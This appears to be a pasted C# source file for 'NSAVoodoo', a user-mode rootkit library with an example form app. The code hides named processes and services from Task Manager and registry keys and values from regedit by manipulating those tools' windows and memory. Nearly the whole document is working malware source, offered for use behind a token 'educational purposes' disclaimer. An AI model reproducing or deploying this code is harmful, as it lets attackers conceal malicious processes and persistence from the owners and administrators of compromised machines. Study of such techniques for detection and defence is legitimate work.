· 3 years ago · Apr 21, 2022, 08:20 AM
1// NSAVoodoo - C# (.NET Framework 2) - by Ollydbg .:: http://blogs.gamefilia.com/ollydbg ::.
2// (Api.cs & Rootkit.cs)
3// Requiered references:
4// System.Management
5// System.Windows.Forms
6// Compile as Class Library - AnyCPU
7// For ### educational poruposes ONLY ###
8
9// Api.cs -----------------------------------------------------------------------------------------
10using System;
11using System.Runtime.InteropServices;
12
13namespace NSAVoodooCore
14{
15 internal class Api
16 {
17 [DllImport("user32.dll", SetLastError = true)]
18 public static extern IntPtr FindWindowEx(IntPtr hwndParent, IntPtr hwndChildAfter, string lpszClass, string lpszWindow);
19
20 [DllImport("user32.dll")]
21 public static extern IntPtr GetDlgItem(IntPtr hDlg, int nIDDlgItem);
22
23 [DllImport("user32.dll")]
24 public static extern bool EnableWindow(IntPtr hWnd, bool bEnable);
25
26 [DllImport("user32.dll")]
27 public static extern IntPtr GetMenu(IntPtr hWnd);
28
29 [DllImport("user32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
30 public static extern IntPtr GetSubMenu(IntPtr hMenu, int nPos);
31
32 [DllImport("user32.dll")]
33 public static extern uint GetMenuItemID(IntPtr hMenu, int nPos);
34
35 [DllImport("user32.dll")]
36 public static extern bool EnableMenuItem(IntPtr hMenu, uint uIDEnableItem, uint uEnable);
37
38 [DllImport("user32.dll")]
39 public static extern bool RemoveMenu(IntPtr hMenu, uint uPosition, uint uFlags);
40
41 [DllImport("user32.dll", CharSet = CharSet.Auto)]
42 public static extern IntPtr SendMessage(IntPtr hWnd, uint Msg, IntPtr wParam, IntPtr lParam);
43
44 [DllImport("user32.dll", CharSet = CharSet.Auto)]
45 public static extern IntPtr SendMessage(IntPtr hWnd, uint Msg, IntPtr wParam, string lParam);
46
47 [DllImport("user32.dll", CharSet = CharSet.Auto)]
48 public static extern IntPtr SendMessage(IntPtr hWnd, [MarshalAs(UnmanagedType.U4)] int msg, IntPtr wParam, ref Api.TvItem item);
49
50 [DllImport("user32.dll")]
51 public static extern int SendMessage(IntPtr hWnd, int Msg, uint wParam, IntPtr lParam);
52
53 [DllImport("user32.dll")]
54 public static extern bool LockWindowUpdate(IntPtr hWndLock);
55
56 [DllImport("user32.dll")]
57 public static extern bool ShowWindowAsync(IntPtr hWnd, int nCmdShow);
58
59 [DllImport("user32.dll")]
60 [return: MarshalAs(UnmanagedType.Bool)]
61 public static extern bool GetWindowPlacement(IntPtr hWnd, ref Api.WindowPlacement lpwndpl);
62
63 [DllImport("kernel32.dll")]
64 public static extern IntPtr OpenProcess(uint dwDesiredAccess, [MarshalAs(UnmanagedType.Bool)] bool bInheritHandle, int dwProcessId);
65
66 [DllImport("kernel32.dll")]
67 public static extern bool CloseHandle(IntPtr hObject);
68
69 [DllImport("kernel32.dll", SetLastError = true)]
70 public static extern IntPtr VirtualAllocEx(IntPtr hProcess, IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
71
72 [DllImport("kernel32.dll", SetLastError = true)]
73 public static extern bool VirtualFreeEx(IntPtr hProcess, IntPtr lpAddress, int dwSize, uint dwFreeType);
74
75 [DllImport("kernel32.dll")]
76 public static extern bool ReadProcessMemory(IntPtr hProcess, IntPtr baseAddress, byte[] buffer, int dwSize, out int numberOfBytesRead);
77
78 [DllImport("kernel32.dll")]
79 public static extern bool ReadProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, IntPtr lpBuffer, int dwSize, int lpNumberOfBytesRead);
80
81 [DllImport("kernel32.dll")]
82 public static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, ref Api.TvItem buffer, int dwSize, IntPtr lpNumberOfBytesWritten);
83
84 [DllImport("kernel32.dll", SetLastError = true)]
85 public static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, uint nSize, out int lpNumberOfBytesWritten);
86
87 [DllImport("kernel32.dll")]
88 public static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, ref Api.LvItem buffer, int dwSize, int lpNumberOfBytesWritten);
89
90 [DllImport("kernel32.dll")]
91 public static extern bool ReadProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, IntPtr lpBuffer, int dwSize, IntPtr lpNumberOfBytesRead);
92
93 [DllImport("user32.dll", SetLastError = true)]
94 public static extern uint GetWindowThreadProcessId(IntPtr hWnd, out uint lpdwProcessId);
95
96 [DllImport("user32.dll")]
97 public static extern IntPtr GetWindowThreadProcessId(IntPtr hWnd, out int lpwdProcessID);
98
99 public struct LvItem
100 {
101 public uint mask;
102 public int iItem;
103 public int iSubItem;
104 public uint state;
105 public uint stateMask;
106 public IntPtr pszText;
107 public int cchTextMax;
108 public int iImage;
109 }
110
111 public struct TvItem
112 {
113 public int mask;
114 public IntPtr hItem;
115 public int state;
116 public int stateMask;
117 public IntPtr pszText;
118 public int cchTextMax;
119 public int iImage;
120 public int iSelectedImage;
121 public int cChildren;
122 public IntPtr lParam;
123 public int iIntegral;
124 }
125
126 public struct Rect
127 {
128 private int left;
129 private int top;
130 private int right;
131 private int bottom;
132 }
133
134 public struct Point
135 {
136 private int x;
137 private int y;
138 }
139
140 public struct WindowPlacement
141 {
142 public int length;
143 public int flags;
144 public int showCmd;
145 public Api.Point ptMinPosition;
146 public Api.Point ptMaxPosition;
147 public Api.Rect rcNormalPosition;
148 }
149 }
150}
151
152// Rootkit.cs -----------------------------------------------------------------------------------------
153using System;
154using System.Collections.Generic;
155using Microsoft.Win32;
156using System.Diagnostics;
157using System.Management;
158using System.Runtime.InteropServices;
159using System.Threading;
160
161namespace NSAVoodooCore
162{
163 public static class Rootkit
164 {
165 private static DateTime TaskManagerTime = DateTime.Now;
166 private static List<string[]> RegistryKeys = new List<string[]>();
167 private static bool Initialized1;
168 private static bool Initialized2;
169 private static bool Initialized3;
170 private static bool Initialized4;
171 private static int TaskManagerCount;
172 private static bool TaskManagerReload;
173
174 static Rootkit()
175 {
176 }
177
178 public static void HideProcess(Process process)
179 {
180 if (!Rootkit.Initialized1)
181 Rootkit.Initialize(1);
182 Rootkit.Proc proc = new Rootkit.Proc(process);
183 Rootkit.TaskManagerReload = true;
184 }
185
186 private static Process GetProcess(string processName)
187 {
188 Process[] processList = Process.GetProcessesByName(processName);
189 if (processList.Length == 0)
190 return null;
191
192 foreach (var process in processList)
193 {
194 return process;
195 }
196 return null;
197 }
198
199 public static void HideProcess(string processName)
200 {
201 if (!Rootkit.Initialized1)
202 Rootkit.Initialize(1);
203
204
205 Process p = GetProcess(processName);
206 if (p != null)
207 {
208 Rootkit.Proc proc = new Rootkit.Proc(p);
209 Rootkit.TaskManagerReload = true;
210 }
211 else
212 {
213 throw new Exception("Process Not Found");
214 }
215 }
216
217 public static void HideService(string serviceName)
218 {
219 if (!Rootkit.Initialized4)
220 Rootkit.Initialize(4);
221 Rootkit.Svc svc = new Rootkit.Svc(serviceName);
222 Rootkit.TaskManagerReload = true;
223 }
224
225 public static void HideRegistryValue(RegistryKey key, string value)
226 {
227 if (!Rootkit.Initialized2)
228 Rootkit.Initialize(2);
229 Rootkit.RegVal regVal = new Rootkit.RegVal(key, value);
230 }
231
232 public static void HideRegistryKey(RegistryKey key)
233 {
234 if (!Rootkit.Initialized3)
235 Rootkit.Initialize(3);
236
237 bool bExist = false;
238 lock (Rootkit.RegistryKeys)
239 {
240 foreach (var registryKey in RegistryKeys)
241 {
242 bool bAreEqual = false;
243 string[] k = key.Name.ToLower().Split(new char[1]
244 {
245 '\\'
246 });
247
248 if (registryKey.Length == k.Length)
249 {
250 for (int i = 0; i < registryKey.Length; i++)
251 {
252 if (registryKey[i] == k[i])
253 {
254 bAreEqual = true;
255 }
256 else
257 {
258 bAreEqual = false;
259 break;
260 }
261 }
262 }
263 if (bAreEqual)
264 {
265 bExist = true;
266 break;
267 }
268 }
269 if (bExist == false)
270 Rootkit.RegistryKeys.Add(key.Name.ToLower().Split(new char[1]
271 {
272 '\\'
273 }));
274 }
275 }
276
277
278 private static void Initialize(int proc)
279 {
280 switch (proc)
281 {
282 case 1:
283 new Thread((ThreadStart)(() =>
284 {
285 while (true)
286 {
287 Rootkit._HideProcess();
288 Thread.Sleep(10);
289 }
290 })).Start();
291 Rootkit.Initialized1 = true;
292 break;
293 case 2:
294 new Thread((ThreadStart)(() =>
295 {
296 while (true)
297 Thread.Sleep(Rootkit._HideRegistryValue() ? 10 : 250);
298 })).Start();
299 Rootkit.Initialized2 = true;
300 break;
301 case 3:
302 new Thread((ThreadStart)(() =>
303 {
304 while (true)
305 Thread.Sleep(Rootkit._HideRegistryKey() ? 10 : 250);
306 })).Start();
307 Rootkit.Initialized3 = true;
308 break;
309 case 4:
310 new Thread((ThreadStart)(() =>
311 {
312 while (true)
313 {
314 Rootkit._HideService();
315 Thread.Sleep(10);
316 }
317 })).Start();
318 Rootkit.Initialized4 = true;
319 break;
320 }
321 }
322
323 private static void _HideProcess()
324 {
325 try
326 {
327 IntPtr mainWindowHandle = Process.GetProcessesByName("taskmgr")[0].MainWindowHandle;
328 Api.WindowPlacement lpwndpl = new Api.WindowPlacement();
329 lpwndpl.length = Marshal.SizeOf((object)lpwndpl);
330 Api.GetWindowPlacement(mainWindowHandle, ref lpwndpl);
331 bool flag1 = lpwndpl.showCmd == 1 || lpwndpl.showCmd == 3;
332 IntPtr dlgItem = Api.GetDlgItem(Api.FindWindowEx(mainWindowHandle, IntPtr.Zero, (string)null, (string)null), 1009);
333 IntPtr menu = Api.GetMenu(mainWindowHandle);
334 IntPtr subMenu1 = Api.GetSubMenu(menu, 2);
335 IntPtr subMenu2 = Api.GetSubMenu(subMenu1, 1);
336 uint menuItemId = Api.GetMenuItemID(subMenu1, 0);
337 if (subMenu2 != IntPtr.Zero)
338 {
339 Api.SendMessage(mainWindowHandle, 273U, (IntPtr)((long)Api.GetMenuItemID(subMenu2, 3)), IntPtr.Zero);
340 Api.RemoveMenu(subMenu1, (uint)(int)subMenu2, 1U);
341 }
342 Api.EnableMenuItem(menu, menuItemId, 1U);
343 if (flag1)
344 Api.LockWindowUpdate(dlgItem);
345 if ((DateTime.Now - Rootkit.TaskManagerTime).TotalMilliseconds > 1000.0)
346 {
347 Api.SendMessage(mainWindowHandle, 273U, (IntPtr)((long)menuItemId), IntPtr.Zero);
348 Rootkit.TaskManagerTime = DateTime.Now;
349 }
350 GC.Collect();
351 int num = (int)Api.SendMessage(dlgItem, 4100U, IntPtr.Zero, "");
352 if (num != Rootkit.TaskManagerCount || Rootkit.TaskManagerReload)
353 {
354 Rootkit.TaskManagerReload = false;
355 Rootkit.TaskManagerCount = num;
356 for (int index1 = 0; index1 < num; ++index1)
357 {
358 string[] strArray = new string[10];
359 for (int subitem = 0; subitem < 10; ++subitem)
360 {
361 strArray[subitem] = Rootkit.GetListViewItem(dlgItem, index1, subitem).ToLower();
362 if (subitem > 0 && strArray[subitem] == strArray[0])
363 break;
364 }
365 foreach (Rootkit.Proc proc in Rootkit.Proc.List)
366 {
367 bool flag2 = false;
368 bool flag3 = false;
369 for (int index2 = 0; index2 < 10 && strArray[index2] != null && (!flag2 || !flag3); ++index2)
370 {
371 if (strArray[index2].StartsWith(proc.Name))
372 flag2 = true;
373 else if (strArray[index2] == proc.User)
374 flag3 = true;
375 }
376 if (flag2 && flag3)
377 {
378 Api.SendMessage(dlgItem, 4104U, (IntPtr)index1--, IntPtr.Zero);
379 --Rootkit.TaskManagerCount;
380 break;
381 }
382 }
383 }
384 }
385 if (!flag1)
386 return;
387 Api.LockWindowUpdate(IntPtr.Zero);
388 }
389 catch
390 {
391 }
392 }
393
394 private static void _HideService()
395 {
396 try
397 {
398 IntPtr mainWindowHandle = Process.GetProcessesByName("taskmgr")[0].MainWindowHandle;
399 Api.WindowPlacement lpwndpl = new Api.WindowPlacement();
400 lpwndpl.length = Marshal.SizeOf((object)lpwndpl);
401 Api.GetWindowPlacement(mainWindowHandle, ref lpwndpl);
402 bool flag1 = lpwndpl.showCmd == 1 || lpwndpl.showCmd == 3;
403 IntPtr dlgItem = Api.GetDlgItem(Api.FindWindowEx(mainWindowHandle, IntPtr.Zero, (string)null, (string)null), 3504);
404 IntPtr menu = Api.GetMenu(mainWindowHandle);
405 IntPtr subMenu1 = Api.GetSubMenu(menu, 2);
406 IntPtr subMenu2 = Api.GetSubMenu(subMenu1, 1);
407 uint menuItemId = Api.GetMenuItemID(subMenu1, 0);
408 if (subMenu2 != IntPtr.Zero)
409 {
410 Api.SendMessage(mainWindowHandle, 273U, (IntPtr)((long)Api.GetMenuItemID(subMenu2, 3)), IntPtr.Zero);
411 Api.RemoveMenu(subMenu1, (uint)(int)subMenu2, 1U);
412 }
413 Api.EnableMenuItem(menu, menuItemId, 1U);
414 if (flag1)
415 Api.LockWindowUpdate(dlgItem);
416 if ((DateTime.Now - Rootkit.TaskManagerTime).TotalMilliseconds > 1000.0)
417 {
418 Api.SendMessage(mainWindowHandle, 273U, (IntPtr)((long)menuItemId), IntPtr.Zero);
419 Rootkit.TaskManagerTime = DateTime.Now;
420 }
421 GC.Collect();
422 int num = (int)Api.SendMessage(dlgItem, 4100U, IntPtr.Zero, "");
423 if (num != Rootkit.TaskManagerCount || Rootkit.TaskManagerReload)
424 {
425 Rootkit.TaskManagerReload = false;
426 Rootkit.TaskManagerCount = num;
427 for (int index1 = 0; index1 < num; ++index1)
428 {
429 string[] strArray = new string[10];
430 for (int subitem = 0; subitem < 10; ++subitem)
431 {
432 strArray[subitem] = Rootkit.GetListViewItem(dlgItem, index1, subitem).ToLower();
433 if (subitem > 0 && strArray[subitem] == strArray[0])
434 break;
435 }
436 foreach (Rootkit.Svc svc in Rootkit.Svc.List)
437 {
438 bool flag2 = false;
439 bool flag3 = true;//false;
440 for (int index2 = 0; index2 < 10 && strArray[index2] != null && (!flag2 || !flag3); ++index2)
441 {
442 if (strArray[index2].StartsWith(svc.Name))
443 flag2 = true;
444 //else if (strArray[index2] == svc.User)
445 // flag3 = true;
446 }
447 if (flag2 && flag3)
448 {
449 Api.SendMessage(dlgItem, 4104U, (IntPtr)index1--, IntPtr.Zero);
450 //--Rootkit.TaskManagerCount;
451 break;
452 }
453 }
454 }
455 }
456 if (!flag1)
457 return;
458 Api.LockWindowUpdate(IntPtr.Zero);
459 }
460 catch
461 {
462 }
463 }
464
465 private static bool _HideRegistryValue()
466 {
467 bool flag = false;
468 try
469 {
470 IntPtr mainWindowHandle = Process.GetProcessesByName("regedit")[0].MainWindowHandle;
471 flag = true;
472 Api.FindWindowEx(mainWindowHandle, IntPtr.Zero, (string)null, (string)null);
473 IntPtr dlgItem = Api.GetDlgItem(mainWindowHandle, 2);
474 string statusBarText = Rootkit.GetStatusBarText(Api.GetDlgItem(mainWindowHandle, 3), 0);
475 string str = statusBarText.Substring(statusBarText.IndexOf("\\") + 1).ToLower();
476 int num1 = 0;
477 RegistryKey registryKey = (RegistryKey)null;
478 foreach (Rootkit.RegVal regVal in Rootkit.RegVal.List)
479 {
480 if (regVal.Key == str)
481 {
482 registryKey = regVal.RegKey;
483 ++num1;
484 }
485 }
486 if (num1 > 0)
487 {
488 int num2 = (int)Api.SendMessage(dlgItem, 4100U, IntPtr.Zero, IntPtr.Zero);
489 if (num2 != registryKey.ValueCount + 1 - num1)
490 {
491 Api.LockWindowUpdate(dlgItem);
492 for (int index = 1; index < num2; ++index)
493 {
494 foreach (Rootkit.RegVal regVal in Rootkit.RegVal.List)
495 {
496 if (regVal.Key == str && regVal.Value == Rootkit.GetListViewItem(dlgItem, index, 0).ToLower())
497 Api.SendMessage(dlgItem, 4104U, (IntPtr)index--, IntPtr.Zero);
498 }
499 }
500 Api.LockWindowUpdate(IntPtr.Zero);
501 }
502 }
503 }
504 catch
505 {
506 }
507 return flag;
508 }
509
510 private static bool _HideRegistryKey()
511 {
512 bool flag = false;
513 try
514 {
515 IntPtr mainWindowHandle = Process.GetProcessesByName("regedit")[0].MainWindowHandle;
516 flag = true;
517 Api.FindWindowEx(mainWindowHandle, IntPtr.Zero, (string)null, (string)null);
518 IntPtr dlgItem = Api.GetDlgItem(mainWindowHandle, 1);
519 int index = Api.SendMessage(dlgItem, 4362, 4U, (IntPtr)Api.SendMessage(dlgItem, 4362, 0U, IntPtr.Zero));
520 IntPtr num1 = Marshal.AllocHGlobal(1024);
521 int lpwdProcessID;
522 Api.GetWindowThreadProcessId(dlgItem, out lpwdProcessID);
523 IntPtr num2 = Api.OpenProcess(2035711U, false, lpwdProcessID);
524 IntPtr num3 = Api.VirtualAllocEx(num2, IntPtr.Zero, 1024U, 4096U, 4U);
525 Rootkit.ExtractRegKey(num2, dlgItem, index, num1, num3, new List<string>());
526 Marshal.FreeHGlobal(num1);
527 Api.VirtualFreeEx(num2, num3, 0, 32768U);
528 Api.CloseHandle(num2);
529 GC.Collect();
530 }
531 catch
532 {
533 }
534 return flag;
535 }
536
537 private static void ExtractRegKey(IntPtr hProcess, IntPtr hTreeview, int index, IntPtr lpLocalBuffer, IntPtr lpRemoteBuffer, List<string> stack)
538 {
539 for (; index > 0; index = Api.SendMessage(hTreeview, 4362, 1U, (IntPtr)index))
540 {
541 Api.TvItem apitvitem = new Api.TvItem()
542 {
543 mask = 1,
544 hItem = (IntPtr)index,
545 pszText = (IntPtr)((int)lpRemoteBuffer + Marshal.SizeOf(typeof(Api.TvItem))),
546 cchTextMax = (int)byte.MaxValue
547 };
548
549 Api.WriteProcessMemory(hProcess, lpRemoteBuffer, ref apitvitem, Marshal.SizeOf(typeof(Api.TvItem)), IntPtr.Zero);
550 Api.SendMessage(hTreeview, 4364, 0U, lpRemoteBuffer);
551 Api.ReadProcessMemory(hProcess, lpRemoteBuffer, lpLocalBuffer, 1024, IntPtr.Zero);
552 string str = Marshal.PtrToStringAnsi((IntPtr)((int)lpLocalBuffer + Marshal.SizeOf(typeof(Api.TvItem)))).ToLower();
553 if (index > 0)
554 {
555 int index1 = Api.SendMessage(hTreeview, 4362, 4U, (IntPtr)index);
556 stack.Add(str);
557 bool flag1 = false;
558 foreach (string[] strArray in Rootkit.RegistryKeys)
559 {
560 if (stack.Count == strArray.Length)
561 {
562 bool flag2 = true;
563 for (int index2 = 0; index2 < stack.Count; ++index2)
564 {
565 if (stack[index2] != strArray[index2])
566 {
567 flag2 = false;
568 break;
569 }
570 }
571 if (flag2)
572 {
573 flag1 = true;
574 break;
575 }
576 }
577 }
578 stack.RemoveAt(stack.Count - 1);
579 if (flag1)
580 Api.SendMessage(hTreeview, 4353, 4U, (IntPtr)index);
581 else if (index1 > 0)
582 {
583 stack.Add(str);
584 Rootkit.ExtractRegKey(hProcess, hTreeview, index1, lpLocalBuffer, lpRemoteBuffer, new List<string>((IEnumerable<string>)stack.ToArray()));
585 stack.RemoveAt(stack.Count - 1);
586 }
587 }
588 }
589 }
590
591 private static string GetStatusBarText(IntPtr handle, int index)
592 {
593 int dwSize = ((int)Api.SendMessage(handle, 1036U, (IntPtr)index, IntPtr.Zero) & (int)ushort.MaxValue) * 2;
594 uint lpdwProcessId = 0U;
595 int num1 = (int)Api.GetWindowThreadProcessId(handle, out lpdwProcessId);
596 IntPtr num2 = Api.OpenProcess(2033663U, false, (int)lpdwProcessId);
597 IntPtr num3 = Api.VirtualAllocEx(num2, IntPtr.Zero, (uint)dwSize, 12288U, 4U);
598 int numberOfBytesRead = 0;
599 byte[] buffer = new byte[dwSize];
600 Api.SendMessage(handle, 1037U, (IntPtr)index, num3);
601 Api.ReadProcessMemory(num2, num3, buffer, dwSize, out numberOfBytesRead);
602 string str = "";
603 int index1 = 0;
604 while (index1 < buffer.Length)
605 {
606 str = str + (object)Convert.ToChar((int)buffer[index1] | (int)buffer[index1 + 1] << 8);
607 index1 += 2;
608 }
609 Api.CloseHandle(num2);
610 return str;
611 }
612
613 private static string GetListViewItem(IntPtr hWnd, int index, int subitem)
614 {
615 Api.LvItem buffer = new Api.LvItem();
616 IntPtr num1 = Marshal.AllocHGlobal(1024);
617 uint lpdwProcessId;
618 int num2 = (int)Api.GetWindowThreadProcessId(hWnd, out lpdwProcessId);
619 IntPtr num3 = Api.OpenProcess(2035711U, false, (int)lpdwProcessId);
620 IntPtr num4 = Api.VirtualAllocEx(num3, IntPtr.Zero, 1024U, 4096U, 4U);
621 buffer.mask = 1U;
622 buffer.iItem = index;
623 buffer.iSubItem = subitem;
624 buffer.pszText = (IntPtr)((int)num4 + Marshal.SizeOf(typeof(Api.LvItem)));
625 buffer.cchTextMax = 50;
626 Api.WriteProcessMemory(num3, num4, ref buffer, Marshal.SizeOf(typeof(Api.LvItem)), 0);
627 Api.SendMessage(hWnd, 4101U, IntPtr.Zero, num4);
628 Api.ReadProcessMemory(num3, num4, num1, 1024, 0);
629 string str = Marshal.PtrToStringAnsi((IntPtr)((int)num1 + Marshal.SizeOf(typeof(Api.LvItem))));
630 Marshal.FreeHGlobal(num1);
631 Api.VirtualFreeEx(num3, num4, 0, 32768U);
632 Api.CloseHandle(num3);
633 return str;
634 }
635
636 private static string GetProcessUser(Process process)
637 {
638 foreach (ManagementObject managementObject in new ManagementObjectSearcher("Select * From Win32_Process Where ProcessID = " + (object)process.Id).Get())
639 {
640 string[] strArray = new string[1]
641 {
642 ""
643 };
644 if (Convert.ToInt32(managementObject.InvokeMethod("GetOwner", (object[])strArray)) == 0)
645 return strArray[0];
646 }
647 return "";
648 }
649
650
651 private class Svc
652 {
653 public static List<Rootkit.Svc> List = new List<Svc>();
654 public string Name;
655 static Svc()
656 {
657 }
658 public Svc(string serviceName)
659 {
660 this.Name = serviceName.ToLower();
661 bool bExist = false;
662 lock (Rootkit.Svc.List)
663 {
664 foreach (var svc in List)
665 {
666 if (svc.Name == this.Name)
667 {
668 bExist = true;
669 break;
670 }
671 }
672 if (bExist == false)
673 Rootkit.Svc.List.Add(this);
674 }
675 }
676 }
677
678 private class Proc
679 {
680 public static List<Rootkit.Proc> List = new List<Rootkit.Proc>();
681 public string Name;
682 public string User;
683
684 static Proc()
685 {
686 }
687
688 public Proc(Process proc)
689 {
690 this.Name = proc.ProcessName.ToLower();
691 this.User = Rootkit.GetProcessUser(proc).ToLower();
692 bool bExist = false;
693 lock (Rootkit.Proc.List)
694 {
695 foreach (var proc1 in List)
696 {
697 if (proc1.Name == this.Name)
698 {
699 bExist = true;
700 break;
701 }
702 }
703 if (bExist == false)
704 Rootkit.Proc.List.Add(this);
705 }
706
707 }
708 }
709
710 private class RegVal
711 {
712 public static List<Rootkit.RegVal> List = new List<Rootkit.RegVal>();
713 public RegistryKey RegKey;
714 public string Key;
715 public string Value;
716
717 static RegVal()
718 {
719 }
720
721 public RegVal(RegistryKey key, string value)
722 {
723 this.RegKey = key;
724 this.Key = key.Name.ToLower();
725 this.Value = value.ToLower();
726 bool bExist = false;
727
728 lock (Rootkit.RegVal.List)
729 {
730 foreach (var regVal in List)
731 {
732 if (regVal.Key == this.Key && regVal.Value == this.Value)
733 {
734 bExist = true;
735 break;
736 }
737 }
738 }
739 if (bExist==false)
740 Rootkit.RegVal.List.Add(this);
741 }
742 }
743 }
744}
745
746// Example of use -----------------------------------------------------------------------------------------
747// Windows forms aplication. Target: AnyCPU (<---MUST)
748// Add Reference to NSAVoodooCore
749// Note: HideRegistryKey & HideRegistryValue requiered admin rights in Vista/7
750
751using System;
752using System.Windows.Forms;
753using Microsoft.Win32;
754
755namespace testA
756{
757 public partial class Form1 : Form
758 {
759 public Form1()
760 {
761 InitializeComponent();
762 this.FormClosing += new FormClosingEventHandler(Form1_FormClosing);
763 }
764
765 void Form1_FormClosing(object sender, FormClosingEventArgs e)
766 {
767 GC.Collect();
768 Environment.Exit(Environment.ExitCode);
769 }
770
771 private void button1_Click(object sender, EventArgs e)
772 {
773 NSAVoodooCore.Rootkit.HideProcess(System.Diagnostics.Process.GetCurrentProcess());
774 }
775
776 private void button2_Click(object sender, EventArgs e)
777 {
778 NSAVoodooCore.Rootkit.HideProcess("calc");
779 }
780
781 private void button3_Click(object sender, EventArgs e)
782 {
783 NSAVoodooCore.Rootkit.HideProcess("notepad");
784 }
785
786 private void button4_Click(object sender, EventArgs e)
787 {
788 NSAVoodooCore.Rootkit.HideService("SQLWriter");
789 }
790
791 private void button5_Click(object sender, EventArgs e)
792 {
793 RegistryKey key = Registry.CurrentUser.OpenSubKey(@"Software\test\a");
794 NSAVoodooCore.Rootkit.HideRegistryKey(key);
795 }
796
797 private void button7_Click(object sender, EventArgs e)
798 {
799 RegistryKey key = Registry.CurrentUser.OpenSubKey(@"Software\test\b");
800 NSAVoodooCore.Rootkit.HideRegistryValue(key,"key2");
801 }
802 }
803}